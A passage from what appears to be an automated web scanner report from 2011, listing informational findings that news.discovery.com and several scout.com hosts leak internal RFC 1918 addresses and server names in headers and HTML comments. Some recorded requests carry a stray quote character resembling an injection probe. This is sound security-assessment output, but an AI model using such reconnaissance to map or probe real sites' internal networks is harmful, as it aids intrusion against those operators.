<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...

27.27. http://news.discovery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.discovery.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: news.discovery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix)
Content-Length: 62539
Content-Type: text/html; charset=UTF-8
X-ServerId: 192.168.32.151
Content-Language: en-US
Cache-Control: max-age=292
Date: Sun, 30 Jan 2011 02:17:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html
xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en"
>

<head>
<meta http-equiv
...[SNIP]...

27.28. http://preps.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://preps.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: preps.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:49 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 29848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>High School Sports Front Page</title>
<meta http-equiv="Con
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=225&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 15:57:33 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:57:33 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=225&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 141 ms
-->
...[SNIP]...

27.29. http://profootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profootball.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: profootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:16:11 GMT
ETag: "1CBC023A97B2780"
Content-Type: text/html
Content-Length: 41358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=127&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 18:16:11 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 6:16:11 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=127&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 736 ms
-->
...[SNIP]...

27.30. http://recruiting.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Last-Modified: Sun, 30 Jan 2011 02:15:18 GMT
ETag: "1CBC02389E3FF00"
Content-Type: text/html
Content-Length: 280509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=73&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 18:15:18 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 6:15:15 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=73&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 1,976 ms
-->
...[SNIP]...

27.31. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 29 Jan 2011 23:50:44 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:44 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 1/27/2011 4:49:27 PM
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Thursday, January 27, 2011 4:49:27 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 69 ms
-->
...[SNIP]...

27.32. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 23 ms
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211505

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 6:16:08 PM
URL: http://192.168.20.186:80/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011
Server IP: 192.168.20.75, SCOUTWEB8
Page Execution Time: 58 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB6) from url (http://192.168.20.186/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011) in 23 ms. DateTime = 1/29/2011 6:18:16 PM -->

27.33. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:08:40 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 25 ms
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 18:18:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211423

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 10:08:19 AM
URL: http://192.168.20.186:80/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011
Server IP: 192.168.20.77, SPRUCE
Page Execution Time: 39 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB9) from url (http://192.168.20.186/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011) in 25 ms. DateTime = 1/30/2011 10:08:40 AM -->

27.34. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:57:28 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 21 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:07:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211420

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 8:57:12 AM
URL: http://192.168.20.186:80/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011
Server IP: 192.168.20.63, CEDAR
Page Execution Time: 46 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB6) from url (http://192.168.20.186/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011) in 21 ms. DateTime = 1/30/2011 8:57:28 AM -->

27.35. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:50:45 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 21 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211589

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:48:55 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 38 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB3) from url (http://192.168.20.181/Legacy/a.z?s=73&p=9&c=4&pid=88&yr=2011) in 21 ms. DateTime = 1/29/2011 3:50:45 PM -->

27.36. http://rss.scout.com/rss.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=900
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263787

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:49:40 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319201796472909&NoRedir=1
Server IP: 192.168.20.63, CEDAR
Page Execution Time: 178 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB4) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319201796472909&NoRedir=1) in 196 ms. DateTime = 1/29/2011 5:49:39 PM -->

27.37. http://rss.scout.com/rss.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=891
Date: Sun, 30 Jan 2011 18:08:42 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263784

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 5:18:09 AM
URL: http://192.168.20.186:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319614898049257&NoRedir=1
Server IP: 192.168.20.72, SANDPOINT
Page Execution Time: 191 ms
-->
...[SNIP]...
<!-- streamed by server (SODO) from url (http://192.168.20.186/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319614898049257&NoRedir=1) in 218 ms. DateTime = 1/30/2011 5:18:09 AM -->

27.38. http://scouthoops.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scouthoops.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: scouthoops.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:37:08 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:47:08 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:20 GMT
ETag: "1CBC00F91011200"
Content-Type: text/html
Content-Length: 111693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=75&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 15:52:19 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:52:18 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=75&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 332 ms
-->
...[SNIP]...

27.39. https://secure.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:50:53 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:00:53 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 1/27/2011 4:49:27 PM
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Thursday, January 27, 2011 4:49:27 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 69 ms
-->
...[SNIP]...

27.40. https://secure.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%26pid%3D88%27%26yr%3D2011 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88'&yr=2011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:06 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
January 29, 2011 5:25:06 PM
URL: http://secure.scout.com:443/Legacy/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011
Server IP: 192.168.20.86, SECURE2
Page Execution Time: 119 ms
-->
...[SNIP]...

27.41. https://secure.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88 HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:59 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
te: Saturday, January 29, 2011 6:18:59 PM
URL: http://secure.scout.com:443/Legacy/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88
Server IP: 192.168.20.87, SECURE3
Page Execution Time: 101 ms
-->
...[SNIP]...

27.42. https://secure.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%26pid%3D88%27%26yr%3D2011 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88'&yr=2011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:20:16 GMT
Server: Microsoft-IIS/6.0
Server: Secure1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
January 30, 2011 9:20:16 AM
URL: http://secure.scout.com:443/Legacy/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011
Server IP: 192.168.20.85, SECURE1
Page Execution Time: 100 ms
-->
...[SNIP]...

27.43. http://stackoverflow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
